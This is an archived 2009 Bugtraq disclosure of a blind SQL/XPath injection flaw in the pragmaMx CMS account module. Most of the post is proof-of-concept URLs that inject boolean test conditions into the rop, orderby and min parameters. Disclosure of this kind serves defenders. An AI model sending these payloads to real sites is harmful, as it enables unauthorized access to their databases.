lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 20 Dec 2009 23:15:51 -0000
From: hadikiamarsi@...mail.com
To: bugtraq@...urityfocus.com
Subject: pragmaMx CMS Blind SQL/XPath Injection vulnerability

###########################################
#
# CMS Name : pragmaMx ( All Version )
#
# Bug Type : Blind SQL/XPath Injection vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download
#

###########################################

PoC :

http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@...ress.tst 
http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@...ress.tst&min=0'+and+31337-31337='0&orderby=dateD
http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@...ress.tst"+and+31337-31337="0

example :

http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@...ress.tst 
http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0

local Example :

http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@...ress.tst 
http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch
http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD
http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0

Powered by blists - more mailing lists